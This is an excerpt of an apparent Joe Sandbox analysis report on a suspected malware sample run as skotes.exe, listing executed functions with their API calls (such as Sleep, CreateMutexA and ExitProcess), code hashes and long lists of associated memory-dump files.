Associated: 00000000.00000002.1467265783.00000000005E3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467308667.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467331767.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_UyiH4t5dph.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$CurrentThread$Cnd_broadcast
String ID:
API String ID: 57040152-0
Opcode ID: c1baf4d08805f1df1405163cb9d5304a3eb9a24114c05e984e62829778eccc83
Instruction ID: ff5f00b53d3050c26f8af4840b67037448065602f4697a8d3e2006751e7038ec
Opcode Fuzzy Hash: c1baf4d08805f1df1405163cb9d5304a3eb9a24114c05e984e62829778eccc83
Instruction Fuzzy Hash: 99A1D070A212469FDB21DFA5C84479AB7B8FF15310F54812AE815D7341EB31EE25CBD2

Function 002EBB72 Relevance: 6.1, APIs: 4, Instructions: 80COMMON

Download Yara Rule

APIs

_xtime_get.LIBCPMT ref: 002EBBCA
__Xtime_diff_to_millis2.LIBCPMT ref: 002EBBE4
_xtime_get.LIBCPMT ref: 002EBC07
__Xtime_diff_to_millis2.LIBCPMT ref: 002EBC13

Memory Dump Source

Source File: 00000000.00000002.1464681693.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1464656048.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1464681693.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1464800236.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1464865315.000000000033B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1464886470.0000000000347000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465105384.00000000004A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465169337.00000000004A3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465206560.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465326334.00000000004B7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465347617.00000000004B8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465347617.00000000004C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465456215.00000000004CB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465489162.00000000004CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465514994.00000000004D5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465566647.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465587541.00000000004D7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465649423.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465681666.00000000004F2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465812022.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465841886.00000000004FB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465934999.0000000000509000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466061014.000000000051B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466117563.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466217899.000000000051E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466328011.0000000000524000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466360577.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466397140.0000000000537000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466508084.0000000000545000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466526095.0000000000546000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466560000.0000000000547000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466652427.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466668941.0000000000556000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466743514.0000000000557000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466802032.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466829157.0000000000562000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466829157.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466970424.00000000005CC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467010231.00000000005CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467081116.00000000005CE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467102225.00000000005D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467155428.00000000005D6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467186116.00000000005E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467265783.00000000005E3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467308667.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467331767.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_UyiH4t5dph.jbxd

Yara matches

Similarity

API ID: Xtime_diff_to_millis2_xtime_get
String ID:
API String ID: 531285432-0
Opcode ID: 12a99632fa077c55ea74a9b709fa5bbc5bbe55cc2218d297d0fba758f9c676d0
Instruction ID: 8be47bbb13876587a29d1e72227e2ed41844b3348b18d4c3976049812be0dc5e
Opcode Fuzzy Hash: 12a99632fa077c55ea74a9b709fa5bbc5bbe55cc2218d297d0fba758f9c676d0
Instruction Fuzzy Hash: 40213D71A50249AFDF01EFA5D8829BFB7B9EF48710F60041AF905A7261DB309D129FA0

Analysis Process: skotes.exePID: 8080, Parent PID: 7852COMMON

Execution Graph

Execution Coverage:	1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	1779
Total number of Limit Nodes:	15

Executed Functions

Function 00C1652B Relevance: 1.5, APIs: 1, Instructions: 24
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(?,?,00C1652A,?,?,?,?,?,00C17661), ref: 00C16567

Memory Dump Source

Source File: 00000002.00000002.1494086118.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000002.00000002.1494070267.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494086118.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494147272.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494163378.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494180512.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494301730.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494321263.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494348892.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494367753.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494385723.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494385723.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494435311.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494454135.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494478539.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494499056.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494518059.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494538130.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494561378.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494577507.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494602349.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494622052.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494647286.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494667013.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494685161.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494704705.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494730253.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494748853.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494769213.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494789187.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494807530.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494827024.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494847455.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494871438.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494895039.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494918014.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494918014.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494975892.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494994428.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495011286.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495031618.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495048097.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495068706.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495089390.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495113050.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495131132.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_be0000_skotes.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: ecf2a667ee3af685b7885973df2d332425683da16dbcb17760b0b69befb09194
Instruction ID: 8b87d2647f994476020bc3c76297083fbc6f826e3f4ff0e13c9c105c699948d4
Opcode Fuzzy Hash: ecf2a667ee3af685b7885973df2d332425683da16dbcb17760b0b69befb09194
Instruction Fuzzy Hash: 60E08630081608EFCE257B58C9499993B1AEF43749F400C04FC188A122CB35EEC1E551

Function 00BE9BA5 Relevance: 3.1, APIs: 2, Instructions: 140
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00BEA963
CreateMutexA.KERNELBASE(00000000,00000000,00C43254), ref: 00BEA981

Memory Dump Source

Source File: 00000002.00000002.1494086118.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000002.00000002.1494070267.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494086118.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494147272.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494163378.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494180512.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494301730.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494321263.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494348892.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494367753.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494385723.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494385723.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494435311.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494454135.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494478539.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494499056.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494518059.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494538130.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494561378.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494577507.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494602349.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494622052.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494647286.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494667013.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494685161.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494704705.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494730253.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494748853.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494769213.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494789187.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494807530.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494827024.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494847455.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494871438.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494895039.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494918014.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494918014.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494975892.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494994428.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495011286.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495031618.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495048097.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495068706.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495089390.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495113050.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495131132.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_be0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 740f878dcd2d41d2f890b29ea45b167035232a2b02ec08863ce99c8955122d2f
Instruction ID: b07100a668bf240cc25c1cf8abedfd687b6dc725b6b1de2a73624b2c8aa32962
Opcode Fuzzy Hash: 740f878dcd2d41d2f890b29ea45b167035232a2b02ec08863ce99c8955122d2f
Instruction Fuzzy Hash: 19317B316042849BEB18EB7DDC8976DBBE6EFC6310F304298E414D73D6C775A9848752

Function 00BE9F44 Relevance: 3.1, APIs: 2, Instructions: 137
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00BEA963
CreateMutexA.KERNELBASE(00000000,00000000,00C43254), ref: 00BEA981

Memory Dump Source

Source File: 00000002.00000002.1494086118.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000002.00000002.1494070267.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494086118.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494147272.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494163378.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494180512.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494301730.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494321263.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494348892.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494367753.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494385723.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494385723.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494435311.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494454135.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494478539.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494499056.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494518059.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494538130.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494561378.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494577507.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494602349.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494622052.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494647286.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494667013.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494685161.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494704705.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494730253.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494748853.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494769213.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494789187.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494807530.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494827024.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494847455.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494871438.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494895039.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494918014.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494918014.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494975892.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494994428.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495011286.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495031618.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495048097.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495068706.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495089390.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495113050.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495131132.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_be0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: d228f58b5bcc1dce609b7d9369146821ae29ae2b9d76f41c8e9d15e19e061a6e
Instruction ID: be2f5bea7866677d8ed42e32d0f2ba1a3e13ed2aeaa9a7c3a60fd7c393d24e3b
Opcode Fuzzy Hash: d228f58b5bcc1dce609b7d9369146821ae29ae2b9d76f41c8e9d15e19e061a6e
Instruction Fuzzy Hash: 7C317B317001849BEB189B7DDC987ACB7E6EFC6310F204698E414DB3D6C775B9848762

Function 00BEA079 Relevance: 3.1, APIs: 2, Instructions: 136
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00BEA963
CreateMutexA.KERNELBASE(00000000,00000000,00C43254), ref: 00BEA981

Memory Dump Source

Source File: 00000002.00000002.1494086118.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000002.00000002.1494070267.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494086118.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494147272.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494163378.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494180512.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494301730.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494321263.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494348892.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494367753.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494385723.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494385723.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494435311.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494454135.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494478539.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494499056.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494518059.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494538130.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494561378.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494577507.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494602349.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494622052.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494647286.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494667013.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494685161.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494704705.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494730253.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494748853.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494769213.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494789187.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494807530.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494827024.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494847455.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494871438.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494895039.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494918014.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494918014.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494975892.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494994428.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495011286.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495031618.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495048097.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495068706.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495089390.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495113050.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495131132.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_be0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: cc0020c37f36982f1d5530581cd3fb771b45d006d811abd87ee54350d97bfb57
Instruction ID: ad951c1112ad6e8d0a70b229d1fab8a676239faa8427e75c2cea6ef912d7f752
Opcode Fuzzy Hash: cc0020c37f36982f1d5530581cd3fb771b45d006d811abd87ee54350d97bfb57
Instruction Fuzzy Hash: 943137316002809BEB189B79CC89BACB7A6EBC6310F204698E414E73D6C775B9848613

Function 00BEA1AE Relevance: 3.1, APIs: 2, Instructions: 135
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00BEA963
CreateMutexA.KERNELBASE(00000000,00000000,00C43254), ref: 00BEA981

Memory Dump Source

